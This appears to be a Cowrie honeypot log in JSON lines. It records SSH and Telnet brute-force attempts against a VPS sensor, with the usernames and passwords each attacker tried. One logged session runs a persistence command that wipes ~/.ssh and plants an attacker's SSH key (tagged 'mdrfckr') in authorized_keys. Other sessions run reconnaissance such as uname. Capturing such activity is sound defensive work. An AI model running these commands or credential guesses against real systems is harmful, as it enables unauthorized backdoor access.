{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T01:57:49.259529Z","session":"71ae0bc017f2"}
{"eventid":"cowrie.session.closed","duration":"84.0","message":"Connection lost after 84.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:58:12.936158Z","src_ip":"134.122.191.244","session":"1428cc0cb982"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34222,"dst_ip":"1.2.3.4","dst_port":22,"session":"733cbee64eb2","protocol":"ssh","message":"New connection: 212.227.235.229:34222 (1.2.3.4:22) [session: 733cbee64eb2]","sensor":"my-vps","timestamp":"2025-08-26T01:58:32.206371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:58:32.207430Z","src_ip":"212.227.235.229","session":"733cbee64eb2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:58:32.466399Z","src_ip":"212.227.235.229","session":"733cbee64eb2"}
{"eventid":"cowrie.login.failed","username":"test1","password":"123123","message":"login attempt [test1/123123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:58:33.540957Z","src_ip":"212.227.235.229","session":"733cbee64eb2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:58:34.803134Z","src_ip":"212.227.235.229","session":"733cbee64eb2"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:58:58.610121Z","src_ip":"212.227.235.229","session":"71ae0bc017f2"}
{"eventid":"cowrie.session.connect","src_ip":"116.193.190.177","src_port":45014,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4dbc2d89f5f","protocol":"ssh","message":"New connection: 116.193.190.177:45014 (1.2.3.4:22) [session: b4dbc2d89f5f]","sensor":"my-vps","timestamp":"2025-08-26T01:59:16.509309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:59:16.510228Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:59:16.777292Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin.2024","message":"login attempt [root/Admin.2024] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:59:17.880529Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:59:18.519091Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:59:18.521353Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:59:18.523141Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:59:18.787391Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:59:19.378248Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:59:19.379201Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:59:19.644940Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:59:19.645881Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.session.connect","src_ip":"116.193.190.177","src_port":56550,"dst_ip":"1.2.3.4","dst_port":22,"session":"b678d0648a2d","protocol":"ssh","message":"New connection: 116.193.190.177:56550 (1.2.3.4:22) [session: b678d0648a2d]","sensor":"my-vps","timestamp":"2025-08-26T01:59:19.916332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:59:19.917297Z","src_ip":"116.193.190.177","session":"b678d0648a2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:59:20.186528Z","src_ip":"116.193.190.177","session":"b678d0648a2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:59:21.305066Z","src_ip":"116.193.190.177","session":"b678d0648a2d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:59:22.579812Z","src_ip":"116.193.190.177","session":"b678d0648a2d"}
{"eventid":"cowrie.session.connect","src_ip":"116.193.190.177","src_port":56554,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9a58ad38903","protocol":"ssh","message":"New connection: 116.193.190.177:56554 (1.2.3.4:22) [session: e9a58ad38903]","sensor":"my-vps","timestamp":"2025-08-26T01:59:22.839025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:59:22.839668Z","src_ip":"116.193.190.177","session":"e9a58ad38903"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:59:23.101318Z","src_ip":"116.193.190.177","session":"e9a58ad38903"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:59:24.192637Z","src_ip":"116.193.190.177","session":"e9a58ad38903"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:59:24.454189Z","src_ip":"116.193.190.177","session":"b4dbc2d89f5f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:59:24.456899Z","src_ip":"116.193.190.177","session":"e9a58ad38903"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37822,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9fd3735b058","protocol":"ssh","message":"New connection: 212.227.235.229:37822 (1.2.3.4:22) [session: d9fd3735b058]","sensor":"my-vps","timestamp":"2025-08-26T01:59:53.820724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:59:53.821653Z","src_ip":"212.227.235.229","session":"d9fd3735b058"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:59:54.080681Z","src_ip":"212.227.235.229","session":"d9fd3735b058"}
{"eventid":"cowrie.login.failed","username":"ruslan","password":"123","message":"login attempt [ruslan/123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:59:55.158454Z","src_ip":"212.227.235.229","session":"d9fd3735b058"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:59:56.420234Z","src_ip":"212.227.235.229","session":"d9fd3735b058"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50150,"dst_ip":"1.2.3.4","dst_port":23,"session":"4bbdb8731a0b","protocol":"telnet","message":"New connection: 212.227.125.160:50150 (1.2.3.4:23) [session: 4bbdb8731a0b]","sensor":"my-vps","timestamp":"2025-08-26T02:00:25.326168Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:00:25.415377Z","src_ip":"212.227.125.160","session":"4bbdb8731a0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:00:25.445313Z","src_ip":"212.227.125.160","session":"4bbdb8731a0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49454,"dst_ip":"1.2.3.4","dst_port":22,"session":"a447cce8c119","protocol":"ssh","message":"New connection: 212.227.125.160:49454 (1.2.3.4:22) [session: a447cce8c119]","sensor":"my-vps","timestamp":"2025-08-26T02:00:28.377867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:00:28.378816Z","src_ip":"212.227.125.160","session":"a447cce8c119"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:00:28.439219Z","src_ip":"212.227.125.160","session":"a447cce8c119"}
{"eventid":"cowrie.login.failed","username":"solv","password":"123456","message":"login attempt [solv/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T02:00:28.635348Z","src_ip":"212.227.125.160","session":"a447cce8c119"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:00:29.697232Z","src_ip":"212.227.125.160","session":"a447cce8c119"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44058,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3807281991d","protocol":"ssh","message":"New connection: 212.227.125.160:44058 (1.2.3.4:22) [session: b3807281991d]","sensor":"my-vps","timestamp":"2025-08-26T02:00:37.400831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:00:37.432115Z","src_ip":"212.227.125.160","session":"b3807281991d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:00:37.477491Z","src_ip":"212.227.125.160","session":"b3807281991d"}
{"eventid":"cowrie.login.success","username":"root","password":"ZAQ!XSW@","message":"login attempt [root/ZAQ!XSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:00:38.077487Z","src_ip":"212.227.125.160","session":"b3807281991d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:00:38.401577Z","src_ip":"212.227.125.160","session":"b3807281991d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T02:00:38.402356Z","src_ip":"212.227.125.160","session":"b3807281991d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:00:38.487452Z","src_ip":"212.227.125.160","session":"b3807281991d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:00:38.489086Z","src_ip":"212.227.125.160","session":"b3807281991d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48846,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c0df4b82164","protocol":"ssh","message":"New connection: 212.227.235.229:48846 (1.2.3.4:22) [session: 7c0df4b82164]","sensor":"my-vps","timestamp":"2025-08-26T02:01:12.223067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:01:12.223847Z","src_ip":"212.227.235.229","session":"7c0df4b82164"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:01:12.483820Z","src_ip":"212.227.235.229","session":"7c0df4b82164"}
{"eventid":"cowrie.login.failed","username":"office","password":"office","message":"login attempt [office/office] failed","sensor":"my-vps","timestamp":"2025-08-26T02:01:13.564120Z","src_ip":"212.227.235.229","session":"7c0df4b82164"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:01:14.824641Z","src_ip":"212.227.235.229","session":"7c0df4b82164"}
